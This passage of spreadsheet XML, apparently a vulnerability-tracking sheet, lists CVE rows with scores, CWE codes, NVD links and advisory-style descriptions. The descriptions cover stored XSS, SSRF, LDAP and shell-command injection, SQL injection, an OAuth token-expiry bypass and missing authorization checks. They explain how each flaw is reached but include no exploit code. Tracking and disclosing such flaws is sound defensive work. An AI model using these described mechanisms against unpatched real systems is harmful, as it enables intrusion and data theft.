        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework crawler splash domain page (showDomain.html) is vulnerable to stored cross-site script injection (XSS). User-supplied data originating from imported crawler captures—specifically item IDs, URLs, and screenshot file paths—was interpolated directly into inline JavaScript contexts within the HTML template. This included an onclick attribute that embedded raw screenshot and URL values into a JavaScript function call, and an inline script block that assigned a screenshot value to a JavaScript variable without escaping. An attacker with a user-role API client could craft a malicious crawler capture import containing JavaScript payloads in these fields. When any user (including privileged users) subsequently viewed the affected domain page, the injected script would execute in the victim's browser context, potentially allowing session hijacking, data exfiltration, or unauthorized actions on behalf of the victim. The vulnerability is stored in the application's data layer and triggered upon page rendering, requiring no further interaction beyond loading the domain view.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100190</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100556</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) versions &gt;= 2026.5.2 and &lt; 2026.8.1 contain an incorrect authorization vulnerability in WhatsApp group handling. A group sender who is admitted for ordinary messages but denied by commands.allowFrom or owner command authorization can issue the /new &lt;model&gt; command to reset the shared group session and persist a provider and model override. This allows a command-denied group member to select a provider and model already permitted by the operator for subsequent turns in the shared group session, potentially changing provider routing, cost, data flow, or availability. It does not allow adding a new provider or host command execution. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100556</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100577</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to validate video asset URLs returned by providers, allowing server-side requests to private destinations. A malicious or compromised provider can return private or loopback URLs to cause the CLI to make requests to internal services accessible from the OpenClaw host.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100577</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100591</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed agent gateway. In versions before 2026.7.1, the global Active Memory toggle mutations could omit owner checks. An authorized non-owner external-channel sender could therefore persistently enable or disable Active Memory for the Gateway, disabling memory recall for future sessions or re-enabling global recall where the owner expected it to remain disabled. The issue is limited to persistent global on/off mutations; session-level controls and read-only status remain governed by existing command policy. The issue is fixed in version 2026.7.1. (Suggested title: "OpenClaw before 2026.7.1 missing owner authorization check on Active Memory global toggles".)</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100591</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100592</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed via npm. In versions &gt;= 2026.4.10 and &lt; 2026.7.1, persistent memory dreaming mutations omit owner permission checks. An authorized but non-owner external-channel sender can issue the persistent '/dreaming on' and '/dreaming off' commands to enable or disable the Gateway's Memory Core dreaming behavior, disabling background memory processing or re-enabling durable memory promotion where the owner expected it to remain disabled; the practical confidentiality, integrity, and availability impact depends on stored conversation material and subsequent memory use. Read-only status and help commands remain governed by normal command policy. The issue is fixed in version 2026.7.1. As a workaround, disable dreaming commands in external channels or restrict channel command access to owners.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100592</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61837</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3, 4.2.9, 4.1.14, and 4.0.23, AMQP 1.0 management GET /bindings exposes full binding topology to any authenticated AMQP user without resource/management permission checks. the AMQP 1.0 HTTP-over-AMQP management endpoint GET /bindings (the rabbitamqpmanagement handler) enumerates bindings between an arbitrary source exchange and destination queue/exchange in the caller's virtual host without performing any resource-level permission check. Unlike every sibling operation in the same module (which call checkresourceaccess / bindingchecks), the GET handler ignores the authenticated User and returns the binding list unchanged. As a result, any authenticated AMQP 1.0 client that can open a management link pair , including users with no management/monitoring/policymaker/administrator tag , can enumerate the complete binding topology (source exchanges, destination queues/exchanges, routing keys, and binding arguments) of the virtual host they can access. The equivalent HTTP management API (GET /api/bindings) Confidentiality impact: a non-management AMQP 1.0 user can enumerate the complete routing topology of any virtual host it can connect to , every (source exchange, destination queue/exchange, routing key, binding arguments) This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, and 4.0.23.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61837</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67223</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. The advisory establishes affected 3.13, 4.0, 4.1, 4.2, and 4.3 maintenance lines but contains conflicting first-fixed versions for the 3.13, 4.0, and 4.1 lines. fill/2 substitutes ${username} into user_dn_pattern without RFC 4514 DN escaping, allowing a crafted username to alter the LDAP bind DN and potentially select a different directory entry. Exploitation requires rabbitmq_auth_backend_ldap with a user_dn_pattern containing ${username}, a directory layout in which the injected suffix resolves usefully, and a password valid for the resulting DN. The advisory body identifies 3.13.15, 4.0.20, 4.1.11, 4.2.9, and 4.3.3 as fixed, while structured metadata identifies 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3. No fixed-version assertion is certifiable until a curator resolves this conflict.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67223</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67225</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, the stream protocol stored the FrameMax value negotiated during the Tune handshake but did not compare it with an inbound frame's declared length before buffering the frame. With the stream plugin enabled, a remote client could therefore cause excessive memory pressure and denial of service by declaring an oversized frame. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67225</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67230</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, the Web STOMP WebSocket handler enforced neither max_frame_size nor login_timeout before authentication, allowing an unauthenticated client to keep a connection alive with a slow stream of small frames and accumulate unbounded pre-authentication state. The rabbitmq_web_stomp plugin must be enabled, and no authentication is required to reach the vulnerable path. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67230</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67242</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, OAuth2 isinteger(Exp) guard skips token-expiry checks for float exp. validatetokenexpiry/1 (lines 208-214) and expirytimestamp/1 (138-144) both guard with 'when isinteger(Exp)' and fall through to ok/never for float values. josejwt:verify validates only the signature, not exp. With float exp, no expiry validation occurs anywhere in the If the IdP emits exp as a JSON float (RFC 7519 permits fractional NumericDate), both the login-time expiry check and the mid-connection disconnect timer are silently skipped , an already-expired token is accepted, and connections never time OAuth2 backend enabled IdP emits float exp (uncommon; mainstream IdPs emit integers) Attacker possesses a previously-valid signed. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67242</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84463</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-79, CWE-838</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, a user with Knowledge Base editing rights for a category can embed a video widget in a published answer with a specially crafted value. When the answer is rendered, that value is inserted into the page's HTML without being escaped for its attribute context, allowing it to break out and inject additional HTML into the page. When another user who has permission to switch between user sessions views the affected answer, the injected HTML causes their browser to silently send a request to Zammad's session-switching endpoint using their own active credentials. This results in switching their session to an account chosen by the person who wrote the Knowledge Base answer. No action is required from the viewer beyond opening the published answer. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84463</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97863</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>cisco, gin</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>The cisco_firesight_manager_ACL_rule_export module in misp-modules generates a shell script (.sh) that authenticates to and calls the Cisco fireSIGHT Manager API. The module interpolates configuration values (IP address, login, password, domain ID, policy ID) and MISP attribute values (destination IPs, URLs, event info comments) directly into single-quoted shell string assignments without any escaping or sanitization. Because the values are placed inside single-quoted shell strings, any value containing a single-quote character (e.g., a crafted ip-dst or url attribute value submitted to MISP) breaks out of the quoting context, allowing an attacker to inject arbitrary shell commands into the exported script. A security analyst who subsequently executes the generated .sh file unmodified would run the injected commands with their own privileges, potentially exposing fireSIGHT Manager credentials, modifying ACL rules, or compromising the analyst workstation. Additionally, the module contained a secondary defect where the variable 'config' was only assigned inside a conditional block but referenced unconditionally afterward, causing a NameError (denial of service) when the request payload lacked a 'config' key. The vulnerability requires the attacker to have the ability to submit MISP events or attributes containing a single-quote character and the victim to execute the exported script. No authentication bypass is required beyond standard MISP event-submission privileges.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97863</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97886</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected by this vulnerability is an unknown functionality of the file managevideos2.php. Such manipulation of the argument editassid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97886</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97895</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in krayin laravel-crm up to 2.2.5. This affects an unknown part of the file packages/Webkul/Admin/src/Http/Controllers/Settings/UserController.php of the component User Management. Executing a manipulation of the argument role_id can lead to improper privilege management. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.6 is able to mitigate this issue. This patch is called 5469d70336fbb25e8e513683e82b32982ce8aa82. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
